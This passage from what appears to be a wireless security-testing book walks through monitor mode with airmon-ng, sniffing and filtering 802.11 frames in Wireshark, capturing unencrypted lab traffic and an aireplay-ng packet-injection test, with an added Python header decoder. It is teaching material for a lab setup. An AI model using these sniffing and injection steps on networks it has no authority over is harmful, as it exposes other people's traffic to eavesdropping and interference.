enter iwconfig to confirm that your card has been detected and the driver has 
been loaded properly: 


root@bt:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wmaster0  no wireless extensions.

wlan0     IEEE 802.11bg  ESSID:""
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated
          Tx-Power=27 dBm
          Retry min limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

root@bt:~#




















2. Use the ifconfig wlan0 up command to bring the card up. Verify the card is up 
by running ifconfig wlan0. You should see the word UP in the second line of the 
output as shown: 


root@bt:~# ifconfig wlan0 up
root@bt:~#
root@bt:~# ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:c0:ca:3e:bd:93
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)





3. To put our card into monitor mode, we will use the airmon-ng utility which is 
available by default on BackTrack. First run airmon-ng to verify it detects the 
available cards. You should see the wlan0 interface listed in the output: 


root@bt:~# airmon-ng


Interface       Chipset         Driver

wlan0           RTL8187         rtl8187 - [phy0]

root@bt:~#
4. Now enter airmon-ng start wlan0 to create a monitor mode interface 
corresponding to the wlan0 device. This new monitor mode interface will be 
named mon0. You can verify it has been created by running airmon-ng without 
arguments again: 


root@bt:~# airmon-ng start wlan0


Interface       Chipset         Driver

wlan0           RTL8187         rtl8187 - [phy0]
                                (monitor mode enabled on mon0)

root@bt:~#
root@bt:~# airmon-ng


Interface       Chipset         Driver

wlan0           RTL8187         rtl8187 - [phy0]
mon0            RTL8187         rtl8187 - [phy0]

root@bt:~#





5. Also, running ifconfig should now display a new interface called mon0: 


root@bt:~# ifconfig
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

mon0      Link encap:UNSPEC  HWaddr 00-C0-CA-3E-BD-93-00-00-00-00-00-00-00-00-00-00
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3794 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:422986 (422.9 KB)  TX bytes:0 (0.0 B)

wlan0     Link encap:Ethernet  HWaddr 00:c0:ca:3e:bd:93
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

wmaster0  Link encap:UNSPEC  HWaddr 00-C0-CA-3E-BD-93-00-00-00-00-00-00-00-00-00-00
          UP RUNNING  MTU:0  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

root@bt:~#
We have successfully created a monitor mode interface mon0. This interface will be used to 
sniff wireless packets off the air. This interface has been created for our wireless Alfa card. 

It is possible to create multiple monitor mode interfaces using the same physical card. Use 
the airmon-ng utility to see how you can do this. 


Awesome! We have a monitor mode interface just waiting to read some packets off the air. 
So let's get started! 





Follow these instructions to begin sniffing packets: 


1. Power up our access point Wireless Lab which we configured in Chapter 1, 
Wireless Lab Setup. 

[Screenshot: Wireshark Capture Interfaces dialog. The devices are listed with their 
Packets and Packets/s columns and a Start and an Options button each: wmaster0, 
wlan0, mon0 (1378 packets, 160 packets/s), the pseudo-device that captures on all 
interfaces (1378 packets), and lo (127.0.0.1). Status bar: "Ready to load or capture 
| No Packets | Profile: Default".] 
3. Select packet capture from the mon0 interface by clicking on the Start button to the 
right of the mon0 interface as shown in the preceding screenshot. Wireshark will 
begin the capture and now you should see packets within the Wireshark window: 


[Screenshot: "mon0: Capturing - Wireshark". The packet list shows Beacon frames sent 
to Broadcast by access points with MAC prefix 00:25:5e:17:41 (SN=2779 to 2786, 
BI=100, SSID=Broadcast or SSID="Vivek"). The details pane for Frame 1 (131 bytes on 
wire, 131 bytes captured) lists: Radiotap Header v0, Length 32; IEEE 802.11 Beacon 
frame; IEEE 802.11 wireless LAN management frame. The bytes pane begins: 
  00 00 20 00 2f 48 00 00 7a 97 62 2c 00 00 00 00 
  10 02 6c 09 a0 00 cf 01 00 00 00 00 00 00 00 00 
  80 00 00 00 ff ff ff ff ff ff 00 25 5e 17 41 4c 
  00 25 5e 17 41 4c a0 9a fc e1 03 67 1f 00 00 00 
Status bar: mon0: live capture in progress; Packets: 876 Displayed: 876 Marked: 0; 
Profile: Default.] 





4. These are wireless packets which your Alfa Wireless card is sniffing off the air. In 
order to view any packet, select it in the top window and the entire packet will be 
displayed in the middle window: 


[Screenshot: "(Untitled) - Wireshark". The packet list shows Acknowledgement frames, 
Data frames (IntelCor_35:fc:44 to 00:25:5e:17:41:4c) and Beacon frames. The details 
pane for Frame 22739 (102 bytes on wire, 102 bytes captured) reads: 
  Radiotap Header v0, Length 32 
  IEEE 802.11 Beacon frame, Flags: ........C 
  IEEE 802.11 wireless LAN management frame 
    Fixed parameters (12 bytes) 
      Timestamp: 0x0000001F728F8255 
      Beacon Interval: 0.102400 [Seconds] 
      Capability Information: 0x0401 
    Tagged parameters (30 bytes) 
      SSID parameter set: Broadcast 
      Supported Rates: 1.0(B) 2.0(B) 5.5(B) 11.0(B) 
      DS Parameter set: Current Channel: 1 
      Traffic Indication Map (TIM): DTIM 0 of 1 bitmap empty 
      ERP Information: no Non-ERP STAs, do not use protection, long preambles 
      Extended Supported Rates: 6.0 9.0 12.0 18.0 24.0 36.0 48.0 54.0 
Status bar: Packets: 22742 Displayed: 22742 Marked: 0 Dropped: 0; Profile: Default.] 





5. Click on the triangle in front of IEEE 802.11 wireless LAN management frame to expand 
it and view additional information. 


6. Look at the different header fields in the packet and correlate them with the WLAN 
frame types and sub-types you have learned earlier. 


What just happened? 


We just sniffed our first set of packets off the air! We launched Wireshark which used the 
monitor mode interface mon0 we have created previously. You will notice by looking at the 
footer region of Wireshark the speed at which the packets are being captured and also the 
number of packets captured till now. 
Have a go hero - finding different devices 


Wireshark traces can be a bit daunting at times, and even for a reasonably populated 
wireless network, you could end up sniffing a few thousand packets. Hence, it is important to 
be able to drill down to only those packets which interest us. This can be accomplished using 
filters in Wireshark. Explore how you can use these filters to identify unique wireless devices 
in the traces—both access points and wireless clients. 


If you are unable to do this, don't worry as this is the next thing we will learn. 





Time for action — viewing Management, Control, and Data frames 


Now we will learn how to apply filters in Wireshark to look at management, control, 
and data frames. 


Please follow these instructions step-by-step: 


1. To view all the Management frames in the packets being captured, enter the filter 
wlan.fc.type == 0 into the filter window and click on Apply. You can stop the packet 
capture if you want to prevent the packets from scrolling down too fast: 


[Screenshot: "(Untitled) - Wireshark" with Filter: wlan.fc.type == 0 applied. The 
packet list now holds only Beacon frames (packets 22696 to 22742, SN=1859 to 1864 
and SN=714, 717, FN=0, BI=100, SSID=Broadcast or SSID="Vivek"), all sent to 
Broadcast. The details pane for Frame 22739 (102 bytes on wire, 102 bytes captured) 
reads: 
  Radiotap Header v0, Length 32 
  IEEE 802.11 Beacon frame, Flags: ........C 
    Type/Subtype: Beacon frame (0x08)
    Frame Control: 0x0080 (Normal) 
      Version: 0 
      Type: Management frame (0) 
      Subtype: 8 
      Flags: 0x0 
    Duration: 0 
    Destination address: Broadcast (ff:ff:ff:ff:ff:ff) 
    Source address: 00:25:5e:17:41:4d (00:25:5e:17:41:4d) 
    BSS Id: 00:25:5e:17:41:4d (00:25:5e:17:41:4d) 
    Fragment number: 0 
    Sequence number: 1862 
The bytes pane shows the whole frame: 
  0000  00 00 20 00 2f 48 00 00 2a 37 ee 37 00 00 00 00 
  0010  10 02 6c 09 a0 00 b9 01 00 00 00 00 00 00 00 00 
  0020  80 00 00 00 ff ff ff ff ff ff 00 25 5e 17 41 4d 
  0030  00 25 5e 17 41 4d 60 74 55 82 8f 72 1f 00 00 00 
  0040  64 00 01 04 00 00 01 04 82 84 8b 96 03 01 01 05 
  0050  04 00 01 00 00 2a 01 04 32 08 0c 12 18 24 30 48 
  0060  60 6c e7 45 eb cd 
Status bar: Packets: 22742 Displayed: 9839 Marked: 0 Dropped: 0; Profile: Default.] 





2. To view Control Frames, modify the filter expression to read wlan.fc.type == 1: 

[Screenshot: "(Untitled) - Wireshark" with the Control frame filter applied. The packet 
list holds only Acknowledgement frames (receiver address 00:25:5e:17:41:4c or 
IntelCor_35:fc:44). The details pane for Frame 22721 (46 bytes on wire, 46 bytes 
captured) reads: 
  Radiotap Header v0, Length 32 
  IEEE 802.11 Acknowledgement, Flags: ........C 
    Type/Subtype: Acknowledgement (0x1d) 
    Frame Control: 0x0004 (Normal) 
      Version: 0 
      Type: Control frame (1) 
      Subtype: 13 
      Flags: 0x0 
    Duration: 0 
    Receiver address: 00:25:5e:17:41:4c (00:25:5e:17:41:4c) 
    Frame check sequence: 0xaa59e218 [correct]] 

[Screenshot: "(Untitled) - Wireshark" with the same filter changed to select Data 
frames (Type: Data frame (2)). The packet list shows Data frames between 
IntelCor_35:fc:44 and 00:25:5e:17:41:4c. The details pane of the selected frame reads: 
  Radiotap Header v0, Length 32 
  IEEE 802.11 Data, Flags: .p.....TC 
    Type/Subtype: Data (0x20) 
    Frame Control: 0x4108 (Normal) 
    Duration: 44 
    BSS Id: 00:25:5e:17:41:4c (00:25:5e:17:41:4c) 
    Source address: IntelCor_35:fc:44 (00:22:fb:35:fc:44) 
    Destination address: 00:25:5e:... 
    Fragment number: 0 
    Sequence number: 1688 
    Frame check sequence: 0xc1bccada [correct] 
    TKIP parameters 
  Data (60 bytes) 
Status bar: Packets: 22742; Profile: Default.] 
4. To additionally select a sub-type, use the wlan.fc.subtype filter. For example, to view 
all the Beacon frames among all Management frames use the following filter: 
(wlan.fc.type == 0) && (wlan.fc.subtype == 8). 


[Screenshot: "mon0: Capturing - Wireshark" with Filter: (wlan.fc.type == 0) && 
(wlan.fc.subtype == 8) applied. Only Beacon frames are listed (packets 187 to 209, 
SN=3899 to 3906, FN=0, BI=100, from 00:25:5e:17:41:4c to 00:25:5e:17:41:4f to 
Broadcast, SSID=Broadcast or SSID="Vivek"). The details pane for Frame 187 (102 bytes 
on wire, 102 bytes captured) reads: 
  Radiotap Header v0, Length 32 
  IEEE 802.11 Beacon frame, Flags: ........C 
    Type/Subtype: Beacon frame (0x08) 
    Frame Control: 0x0080 (Normal) 
      Version: 0 
      Type: Management frame (0) 
      Subtype: 8 
      Flags: 0x0 
    Duration: 0 
    Destination address: Broadcast (ff:ff:ff:ff:ff:ff) 
    Source address: 00:25:5e:17:41:4d (00:25:5e:17:41:4d) 
    BSS Id: 00:25:5e:17:41:4d (00:25:5e:17:41:4d) 
    Fragment number: 0 
Status bar: mon0: live capture in progress; Packets: 25328 Displayed: 18234 Marked: 0; 
Profile: Default.] 





5. Alternatively, you can right-click on any of the header fields in the middle window 
and then select Apply as Filter | Selected to add it as a filter: 


[Screenshot: "(Untitled) - Wireshark". Right-clicking a field of a Beacon frame in the 
details pane (Frame 26988, 102 bytes on wire, 102 bytes captured; Radiotap Header v0, 
Length 32; IEEE 802.11 Beacon frame, Flags: ........C) opens the context menu: 
Expand All, Collapse All, Apply as Filter, Prepare a Filter and Colorize with Filter 
(each with the choices Selected, Not Selected, ... and Selected, ... or Selected, 
... and not Selected, ... or not Selected), Copy, Export Selected Packet Bytes..., 
Wiki Protocol Page, Filter Field Reference, Protocol Preferences..., Disable 
Protocol..., Resolve Name. The status bar describes the selected field as "Type and 
subtype combined"; Packets: 72634 Marked: 0 Dropped: 0.] 





This will automatically add the correct filter expression for you in the Filter field 
as shown: 


[Screenshot: "(Untitled) - Wireshark" after choosing Apply as Filter | Selected. The 
Filter field now holds the expression generated from the selected field, and the 
packet list shows only Beacon frames (packets 26986 to 26993, SN=1040 to 1045, 
BI=100, SSID=Broadcast or SSID="Vivek", all to Broadcast). The details pane for Frame 
26988 (102 bytes on wire, 102 bytes captured) reads: 
  Radiotap Header v0, Length 32 
  IEEE 802.11 Beacon frame, Flags: ........C 
    Type/Subtype: Beacon frame (0x08) 
    Frame Control: 0x0080 (Normal) 
      Version: 0 
      Type: Management frame (0) 
      Subtype: 8 
      Flags: 0x0 
    Duration: 0 
    Destination address: Broadcast (ff:ff:ff:ff:ff:ff) 
    Source address: 00:25:5e:06:db:bb (00:25:5e:06:db:bb) 
    BSS Id: 00:25:5e:06:db:bb (00:25:5e:06:db:bb) 
    Fragment number: 0 
Status bar: Packets: 72634 Displayed: 41258 Marked: 0 Dropped: 0.] 
What just happened? 
We just learned how to filter packets in Wireshark using various filter expressions. This helps 
us to monitor selected packets from devices we are interested in, instead of trying to analyze 
all the packets in the air. 








Also, we can see that the packet headers of Management, Control, and Data frames are in 
plain text and do not contain any encryption. This way anyone who can sniff the packets 
can read these headers. It is also important to note that it is possible for a hacker to 
modify any of these packets and re-transmit them. As there is no integrity or replay attack 
mitigation in the protocol, this is very easy to do. We will look at some of these attacks in 
later chapters. 


You can consult Wireshark's manual to know more about the available filter expressions and 
how to use them. Try playing around with various filter combinations till you are confident 
you can drill down to any level of detail, even in a very large packet trace. 
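The header layout from "Revisiting WLAN frames" and the filters from this exercise, as an added example that is not the book's code: it decodes the Frame Control field, the address fields and Sequence Control of captured frames and reproduces in Python what the Wireshark expressions wlan.fc.type, wlan.fc.subtype and wlan.bssid select. BEACON holds the bytes of Frame 22739 from the hex dump shown earlier in this exercise (radiotap header and FCS included, exactly as Wireshark displayed them); the ACK and QoS data frames, the 8-byte radiotap headers in front of them and their FCS bytes are constructed for this example, and the subtype numbers in the table come from the IEEE 802.11 standard rather than from the book (the book's own screenshots show QoS Data (0x28) as a data subtype, so the table lists it).

```python
"""Decode 802.11 MAC headers and apply Wireshark-style display filters in code.

Added example, not code from the book.  BEACON is the frame from the book's
Wireshark hex dump (radiotap header and FCS included); ACK and QOS_DATA are
constructed here.  Subtype numbers follow the IEEE 802.11 standard.
"""
import struct

MGMT, CTRL, DATA = 0, 1, 2      # the values wlan.fc.type compares against
TYPE_NAMES = {MGMT: "Management", CTRL: "Control", DATA: "Data"}
SUBTYPE_NAMES = {               # (type, subtype) -> name, as listed in this chapter
    (MGMT, 0): "Association Request", (MGMT, 1): "Association Response",
    (MGMT, 2): "Reassociation Request", (MGMT, 3): "Reassociation Response",
    (MGMT, 4): "Probe Request", (MGMT, 5): "Probe Response", (MGMT, 8): "Beacon",
    (MGMT, 10): "Disassociation", (MGMT, 11): "Authentication",
    (MGMT, 12): "Deauthentication", (CTRL, 11): "Request to Send",
    (CTRL, 12): "Clear to Send", (CTRL, 13): "Acknowledgement",
    (DATA, 0): "Data", (DATA, 8): "QoS Data",
}


def mac(b):
    return ":".join("%02x" % x for x in b)


def strip_radiotap(buf):
    """Radiotap header: version 0, a pad byte, then its own length (little endian)."""
    version, _, length = struct.unpack_from("<BBH", buf, 0)
    if version != 0 or length > len(buf):
        raise ValueError("bad radiotap header")
    return buf[length:]


def parse_80211(frame):
    """Decode Frame Control, Duration, the address fields and Sequence Control."""
    fc, flags = frame[0], frame[1]
    h = {"version": fc & 0x03, "type": (fc >> 2) & 0x03, "subtype": fc >> 4,
         "to_ds": bool(flags & 0x01), "from_ds": bool(flags & 0x02),
         "protected": bool(flags & 0x40),
         "duration": struct.unpack_from("<H", frame, 2)[0],
         "addr1": mac(frame[4:10])}
    h["type_subtype"] = (h["type"] << 4) | h["subtype"]     # wlan.fc.type_subtype
    h["name"] = SUBTYPE_NAMES.get((h["type"], h["subtype"]), "%s subtype %d" % (
        TYPE_NAMES.get(h["type"], "Reserved"), h["subtype"]))
    if h["type"] == CTRL:
        return h                # ACK, RTS and CTS carry only the receiver address
    h["addr2"], h["addr3"] = mac(frame[10:16]), mac(frame[16:22])
    seq = struct.unpack_from("<H", frame, 22)[0]
    h["fragment"], h["sequence"] = seq & 0x0f, seq >> 4
    # Which address holds the BSSID depends on the To DS / From DS flags; a frame
    # with both set is a four-address WDS frame and has no single BSSID.
    h["bssid"] = {(False, False): h["addr3"], (True, False): h["addr1"],
                  (False, True): h["addr2"]}.get((h["to_ds"], h["from_ds"]))
    if h["type"] == MGMT and h["subtype"] == 8:
        h["ssid"], h["channel"] = parse_beacon(frame[24:-4])    # body without the FCS
    return h


def parse_beacon(body):
    """Read the SSID and DS Parameter Set (channel) tags from a beacon body."""
    ssid = channel = None
    pos = 12    # fixed parameters: timestamp (8) + beacon interval (2) + capability (2)
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + length]
        if tag == 0:
            ssid = value.decode("utf-8", "replace")   # empty SSID is shown as "Broadcast"
        elif tag == 3 and length == 1:
            channel = value[0]
        pos += 2 + length
    return ssid, channel


def matches(h, fc_type=None, fc_subtype=None, bssid=None):
    """The same test as the wlan.fc.type / wlan.fc.subtype / wlan.bssid filters."""
    return ((fc_type is None or h["type"] == fc_type)
            and (fc_subtype is None or h["subtype"] == fc_subtype)
            and (bssid is None or h.get("bssid") == bssid.lower()))


def apply_filter(frames, **criteria):
    """Parse every captured frame and keep those the filter selects."""
    return [h for h in (parse_80211(strip_radiotap(f)) for f in frames)
            if matches(h, **criteria)]


# Frame 22739 from the book's hex dump: 32-byte radiotap header + beacon + FCS.
BEACON = bytes.fromhex(
    "00002000 2f480000 2a37ee37 00000000"
    "10026c09 a000b901 00000000 00000000"
    "80000000 ffffffff ffff0025 5e17414d"
    "00255e17 414d6074 55828f72 1f000000"
    "64000104 00000104 82848b96 03010105"
    "04000100 002a0104 32080c12 18243048"
    "606ce745 ebcd")
# Constructed frames: a minimal 8-byte radiotap header and a dummy 4-byte FCS.
RADIOTAP = bytes.fromhex("00000800 00000000")
FCS = bytes(4)
ACK = RADIOTAP + bytes.fromhex("d4000000 00255e17 414c") + FCS
QOS_DATA = RADIOTAP + bytes.fromhex(
    "880a4001 001dd940 00a10021 91d28e25 002191d2 8e252001 0000"   # From DS, seq 18
    "aaaa0300 00000800") + FCS                                      # LLC/SNAP, IPv4
FRAMES = [BEACON, ACK, QOS_DATA]

if __name__ == "__main__":
    for h in apply_filter(FRAMES):
        print("%-16s type=%d subtype=%-2d bssid=%s" % (h["name"], h["type"], h["subtype"], h.get("bssid")))
    print("beacon SN:", [h["sequence"] for h in apply_filter(FRAMES, fc_type=MGMT, fc_subtype=8)])
```

apply_filter(FRAMES, fc_type=0, fc_subtype=8) is the (wlan.fc.type == 0) && (wlan.fc.subtype == 8) filter from step 4, and h["type_subtype"] is the value wlan.fc.type_subtype compares against (0x08 for a beacon, 0x1d for an ACK, 0x20 for data, 0x28 for QoS data, as the screenshots show). Every field the parser reads sits in the unencrypted header, which is why the decode is the same for frames of an encrypted network and why the addresses it returns are enough for the "finding different devices" exercise: beacon senders are the access points, and the non-BSSID addresses of data frames are the clients.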


In the next exercise, we will look at how to sniff data packets transferred between our access 
point and wireless client. 





Time for action — sniffing data packets for our network 


In this exercise, we will learn how to sniff Data packets for a given wireless network. For the 
sake of simplicity, we will look at packets without any encryption. 


Follow these instructions to get started: 


1. Switch on the access point we had named Wireless Lab. Let it remain configured 
to use no encryption. 

2. We will first need to find the channel on which the Wireless Lab access point 
is running. To do this, open a terminal and run airodump-ng --bssid 
00:21:91:D2:8E:25 mon0 where 00:21:91:D2:8E:25 is the MAC address of 
our access point. Let the program run, and shortly you should see your access point 
shown on the screen along with the channel it is running on: 


root@bt:~# airodump-ng --bssid 00:21:91:D2:8E:25 mon0

 CH  4 ][ Elapsed: 12 s ][ 2010-12-23 09:11

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:21:91:D2:8E:25  -52        5        0    0  11  54 . OPN              Wireless Lab

 BSSID              STATION            PWR   Rate   Lost  Packets  Probes





3. We can see from the preceding screenshot that our access point Wireless Lab is 
running on Channel 11. Note that this may be different for your access point. 

4. In order to sniff data packets going to and fro from this access point, we need to 
lock our wireless card on the same channel, that is, channel 11. To do this run the 
command iwconfig mon0 channel 11 and then run iwconfig mon0 to verify 
the same. You should see the value Frequency:2.462 GHz in the output. This 
corresponds to Channel 11: 


root@bt:~# iwconfig mon0 channel 11
root@bt:~#
root@bt:~# iwconfig mon0
mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=27 dBm
          Retry min limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
5. Now fire up Wireshark and start sniffing on the mon0 interface. After Wireshark has 
started sniffing the packets, apply a filter for the bssid of our access point as shown 
next using wlan.bssid == 00:21:91:D2:8E:25 in the filter area. Use the appropriate 
MAC address for your access point: 


[Screenshot: "mon0: Capturing - Wireshark" with the filter wlan.bssid == 
00:21:91:d2:8e:25 applied. The packet list shows Beacon frames from D-Link_d2:8e:25 
to Broadcast (SN=2509 to 2519). The details pane for Frame 27 (98 bytes on wire, 98 
bytes captured) reads: 
  Radiotap Header v0, Length 32 
  IEEE 802.11 QoS Data, Flags: ... 
    Type/Subtype: QoS Data (0x28) 
    Frame Control: 0x0A88 (Normal) 
    Duration: 320 
    Destination address: HonHaiPr_40:00:a1 (00:1d:d9:40:00:a1) 
    BSS Id: D-Link_d2:8e:25 (00:21:91:d2:8e:25) 
    Source address: D-Link_d2:8e:25 (00:21:91:d2:8e:25) 
    Fragment number: 0 
    Sequence number: 18 
    Frame check sequence: 0x437ff0c3 [correct] 
    QoS Control 
The bytes pane begins: 
  0000  00 00 20 00 2f 48 00 00 72 0f 91 02 01 00 00 00 
  0010  10 02 9e 09 a0 00 d2 01 00 00 00 00 00 00 00 00 
  0020  88 0a 40 01 00 1d d9 40 00 a1 00 21 91 d2 8e 25 
  0030  00 21 91 d2 8e 25 20 01 00 00 aa aa 03 00 00 00 
Status bar: mon0: live capture in progress; Packets: 12097 Displayed: 4367 Marked: 0; 
Profile: Default.] 








6. In order to see the data packets for our access point, add the following to the filter:
(wlan.bssid == 00:21:91:d2:8e:25) && (wlan.fc.type_subtype == 0x20). Open your
browser on the client laptop and type in the management interface URL of the
access point. In my case, as we saw in Chapter 1, it is http://192.168.0.1. This
will generate data packets that Wireshark will capture:


[Screenshot: Wireshark capturing on mon0 with the filter (wlan.bssid == 00:21:91:d2:8e:25) && (wlan.fc.type_subtype == 0x20). The packet list shows ARP requests from IntelCor_35:fc:44 to Broadcast ("Who has 192.168.1.1? Tell 192.168.1.6"); the details pane shows an IEEE 802.11 Data frame (0x20) with Frame Control 0x0208, Destination address Broadcast (ff:ff:ff:ff:ff:ff), BSS Id D-Link_d2:8e:25 (00:21:91:d2:8e:25) and Source address IntelCor_35:fc:44 (00:22:fb:35:fc:44); status bar: Packets: 49979 Displayed: 40.]


7. As you can see, packet sniffing allows us to analyze unencrypted data packets very 
easily. This is the reason why we need to use encryption in wireless. 





We have just sniffed data packets over the air with Wireshark using various filters. As our
access point is not using any encryption, we are able to see all the data in plain text. This is a
major security issue, as anyone within RF range of the access point can see all the packets
using a sniffer like Wireshark.


Use Wireshark to analyze the data packets further. You would notice that a DHCP request
is made by the client and, if a DHCP server is available, it responds with an address. Then
you would find ARP packets and other protocol packets on the air. This is a nice and simple
way to do passive host discovery on the wireless network. It is important to be able to see
a packet trace and reconstruct how applications on the wireless host are communicating
with the rest of the network. One of the interesting features Wireshark provides is
"Follow a Stream". This allows you to view multiple packets together, which are part of a TCP
exchange, in the same connection.


Also, try logging into gmail.com or any other popular website and analyze the data 
traffic generated. 


We will now see a demonstration of how to inject packets into a wireless network. 


Time for action — packet injection 


We will be using the aireplay-ng tool, which is available in BackTrack, for this exercise.





Follow these instructions carefully: 


1. In order to do an injection test, first start Wireshark and apply the filter expression
(wlan.bssid == 00:21:91:d2:8e:25) && !(wlan.fc.type_subtype == 0x08). This will ensure
that we only see non-beacon packets for our lab network.


2. Now run the following command in a terminal: aireplay-ng -9 -e "Wireless Lab" -a
00:21:91:d2:8e:25 mon0


    root@bt:~# aireplay-ng -9 -e "Wireless Lab" -a 00:21:91:d2:8e:25 mon0
    Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 11
    Trying broadcast probe requests...
    Injection is working!
    Found 1 AP

    Trying directed probe requests...
    00:21:91:D2:8E:25 - channel: 11 - 'Wireless Lab'
    Ping (min/avg/max): 2.400ms/20.042ms/81.616ms Power: -47.13
    30/30: 100%
3. Go back to Wireshark and you should see a lot of packets on the screen now. Some
of these packets have been sent by the aireplay-ng command we launched, and others
are from the access point Wireless Lab in response to the injected packets:


[Screenshot: Wireshark capturing on mon0 during the injection test. The packet list shows Null function and Authentication frames from 00:b3:b2:af:a6:11 to D-Link_d2:8e:25, and Probe Response, Deauthentication and Authentication frames from D-Link_d2:8e:25 back to 00:b3:b2:af:a6:11; the details pane shows a Probe Response (0x05) with Frame Control 0x0050, Type Management frame (0), Subtype 5, Source address D-Link_d2:8e:25 (00:21:91:d2:8e:25).]


We just successfully injected packets into our test lab network using aireplay-ng. It is
important to note that our card injected these arbitrary packets into the network without
actually being connected to the access point Wireless Lab.
Have a go hero — installing BackTrack on Virtual Box


We will look at packet injection in greater detail in later chapters; however, feel free to
explore other options of the aireplay-ng tool to inject packets. You can verify that
injection succeeded by using Wireshark to monitor the air.


Important note on WLAN sniffing and injection 


WLANs typically operate within three different frequency ranges—2.4 GHz, 3.6 GHz, and 
4.9/5.0 GHz. Not all Wi-Fi cards support all these ranges and associated bands. As an 
example, the Alfa card, which we are using, only supports IEEE 802.11b/g. This would mean 
this card cannot operate in 802.11a/n. The key point here is that to sniff or inject packets in a 
particular band, your Wi-Fi card will need to support it. 


Another interesting aspect of Wi-Fi is that in each of these bands, there are multiple 
channels. It is important to note that your Wi-Fi card can only be on one channel at any given 
moment. It is not possible to tune into multiple channels at the same time. The analogy I can 
give you is your car radio. You can tune it to only one of the available channels at any given 
time. If you want to hear something else, you will have to change the channel of the radio. 
The same principle applies to WLAN sniffing. This brings us to an important conclusion—we
cannot sniff all channels at the same time; we will need to select which channel is of interest
to us. What this means is that if our access point of interest is on channel 1, we will need to
set our card on channel 1.


Though we have addressed WLAN sniffing in the previous paragraphs, the same applies to 
injection as well. To inject packets on a specific channel, we will need to put the card radio 
on that channel. 


Let's now do some exercises on setting our card to specific channels, channel hopping, 
setting regulatory domains, power levels, and so on. 





Time for action — experimenting with your Alfa card 


Follow the instructions carefully: 


1. Enter the iwconfig wlan0 command to check the capabilities of your card. As you
can see in the following screenshot, the Alfa card can operate in the b and g bands:
    root@bt:~# iwconfig wlan0
    wlan0     IEEE 802.11bg  ESSID:off/any
              Mode:Managed  Access Point: Not-Associated  Tx-Power=0 dBm
              Retry long limit:7   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
    root@bt:~#





2. Just for demo purposes, when I connect another card, a D-Link DWA-125, we see
that it is capable of the b, g, and n bands:


    root@bt:~# iwconfig wlan0
    wlan0     IEEE 802.11bgn  ESSID:off/any
              Mode:Managed  Access Point: Not-Associated  Tx-Power=0 dBm
              Retry long limit:7   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:on
    root@bt:~#





3. To set the card on a particular channel, we use the iwconfig mon0 channel X
command:


    root@bt:~# iwconfig mon0 channel 11
    root@bt:~# iwconfig mon0
    mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=20 dBm
              Retry long limit:7   RTS thr:off   Fragment thr:off
              Power Management:off
    root@bt:~#
4. The iwconfig series of commands does not have a channel hopping mode.
One could write a simple script over it to make it do so. An easier way is to use
airodump-ng with options to either hop channels arbitrarily, or only over a subset, or
only over selected bands. All these options are illustrated in the following screenshot
when we run airodump-ng --help:


          -h                    : Hides known stations for --showack
          -f       <msecs>      : Time in ms between hopping channels
          --berlin <secs>       : Time before removing the AP/client
                                  from the screen when no more packets
                                  are received (Default: 120 seconds)
          -r       <file>       : Read packets from that file
          -x       <msecs>      : Active Scanning Simulation
          --output-format
                   <formats>    : Output format. Possible values:
                                  pcap, ivs, csv, gps, kismet, netxml

      Filter options:
          --encrypt   <suite>   : Filter APs by cipher suite
          --netmask <netmask>   : Filter APs by mask
          --bssid     <bssid>   : Filter APs by BSSID
          -a                    : Filter unassociated clients

      By default, airodump-ng hop on 2.4GHz channels.
      You can make it capture on other/specific channel(s) by using:
          --channel <channels>  : Capture on specific channels
          --band <abg>          : Band on which airodump-ng should hop
          -C    <frequencies>   : Uses these frequencies in MHz to hop
          --cswitch  <method>   : Set channel switching method
                        0       : FIFO (default)
                        1       : Round Robin
                        2       : Hop on Last
          -s                    : Same as --cswitch

          --help                : Displays this usage screen
We understood that both wireless sniffing and packet injection depend on the hardware
support available. This would mean that we can only operate on bands and channels allowed 
by our card. Also, the wireless card radio can only be on one channel at a time. This would 
further mean that we can only sniff or inject in one channel at a time. 


If you would like to simultaneously sniff on multiple channels, you would require multiple 
physical Wi-Fi cards. If you can procure additional cards, then you can try to sniff on multiple 
channels simultaneously. 
